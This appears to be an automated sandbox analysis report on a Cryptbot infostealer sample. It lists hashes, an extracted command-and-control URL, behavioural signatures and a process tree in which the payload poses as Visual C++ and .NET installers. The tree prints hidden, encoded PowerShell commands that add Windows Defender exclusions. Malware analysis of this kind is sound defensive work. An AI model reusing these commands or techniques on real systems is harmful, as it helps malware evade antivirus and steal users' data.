Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
84s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24/03/2025, 07:18
Static task
static1
Behavioral task
behavioral1
Sample
234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
Resource
win7-20240903-en
General
-
Target
234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
-
Size
3.8MB
-
MD5
52dfbec82ed8b0f36065b6c7dd60db74
-
SHA1
da386493a3cdee427b90b9d61a32a53a1cf7c097
-
SHA256
234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474
-
SHA512
077c226c12525c17d178522cb123322fe37067ab7211402fa56f207ad793778dd54a3a6e594811d502fa2fbffee65e7488b7cf3c24936c1e9b7c28d3d2fff225
-
SSDEEP
98304:ZsLhipLqAerp+/fe6maWwtZ96QWkcsL9ydhhy:gipmHp+/26ma7tZFAdy
Malware Config
Extracted
cryptbot
http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG11
Signatures
-
Cryptbot family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x64.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 8008 powershell.exe 7948 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1268 VC_redist.x64.exe 2428 VC_redist.x86.exe -
Loads dropped DLL 8 IoCs
pid Process 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 1132 WerFault.exe 1132 WerFault.exe 1132 WerFault.exe 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x0008000000015d7f-7.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1132 1268 WerFault.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1268 VC_redist.x64.exe 1268 VC_redist.x64.exe 1268 VC_redist.x64.exe 1268 VC_redist.x64.exe 1268 VC_redist.x64.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1892 wrote to memory of 1268 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 30 PID 1892 wrote to memory of 1268 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 30 PID 1892 wrote to memory of 1268 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 30 PID 1892 wrote to memory of 1268 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 30 PID 1268 wrote to memory of 1132 1268 VC_redist.x64.exe 32 PID 1268 wrote to memory of 1132 1268 VC_redist.x64.exe 32 PID 1268 wrote to memory of 1132 1268 VC_redist.x64.exe 32 PID 1268 wrote to memory of 1132 1268 VC_redist.x64.exe 32 PID 1892 wrote to memory of 2428 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 33 PID 1892 wrote to memory of 2428 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 33 PID 1892 wrote to memory of 2428 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 33 PID 1892 wrote to memory of 2428 1892 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe"C:\Users\Admin\AppData\Local\Temp\234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 4723⤵
- Loads dropped DLL
- Program crash
PID:1132
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Executes dropped EXE
PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"2⤵PID:8132
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {65B6A6E9-F16E-473B-8FFE-2A17EA9B32EA} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:S4U:1⤵PID:7976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABhAHMAaABcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABhAHMAaABcAFQAYQByAGcAZQB0AC4AZQB4AGUA2⤵
- Command and Scripting Interpreter: PowerShell
PID:8008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAASQBkAC4AZQB4AGUAOwA=2⤵
- Command and Scripting Interpreter: PowerShell
PID:7948
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CC079A83-9CC3-4578-9EC2-07DC3DBF643C} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]1⤵PID:3272
-
C:\Users\Admin\AppData\Roaming\Hash\Target.exeC:\Users\Admin\AppData\Roaming\Hash\Target.exe2⤵PID:2636
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:7944
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:3040
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:1916
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:2428
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:7840
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:2772
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:1308
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:8124
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:8104
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵PID:8144
-
-
-
C:\Users\Admin\AppData\Local\FallbackBuffer\kjjljayzh\Id.exeC:\Users\Admin\AppData\Local\FallbackBuffer\kjjljayzh\Id.exe2⤵PID:3768
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵PID:3528
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
628KB
MD597febd6bc5eede82b8837cbaa51e57db
SHA13b22e23708a0bdd6852127dff3090733c2649c49
SHA256c86e5b5811ba311a58a6b0e0bcd6346cf770d37a105f3a64823dba88d472f6b8
SHA512c0fd107f4a9d0ef31f97287bc456f7a746e740164371ba0234883dc3eec7a1145235a95d5205e784a245696a79a71b4e50fc997a4bec9ee5cb90ff5f4ca12cbf
-
Filesize
544KB
MD51336375cf1aaa4efdad95d0b64ea1aac
SHA19be80a505aa2dfcc4db73c8e5264ed5867533e66
SHA25604d68438f75065f5c2997e80a317b1c6fad78d723af585a64d39138861055ec6
SHA51212d91fefeb431b60b2501f7868e25dfa04eb42f94bd630b21fef4f3cd6ae5962b6764215da77824e06c53ae8d5d446b322936406396aaa178c71edf24b765f48
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57578fc2be917db0238451db4ce78e070
SHA1da60b0ab72d4da8bcfc8b7944241eff92c1ee589
SHA2567d30f0aa510a1da684d15e13bb4f4cee8f193083e2f25826e47b70ad9ed63d2a
SHA5124a5b48ce399001ab335278b510a62989299cfd00a9539068f7775b5569c5c9dbfbf45c472e6b83cf9a25b6d3820c4c16c88ed8ede6d8b21866752a51bd6b8fc1
-
Filesize
8.5MB
MD5f1d1d8dc0494c69f77e03f6b5366a2a4
SHA12f20af746b4e69db58c3c0383365ba9da7c6bf26
SHA25611c9dd0e206ed62d39c85600cda77706e91691b3b6557746a916c0bbe5a60721
SHA512df0c70cb54faef30891da8fb7c8e9e877adbe004ee2348d780131586113d50e3d8ed2966538a69dcdeb5f14f689fb53f913a0747062241813d3b0ad1a064da04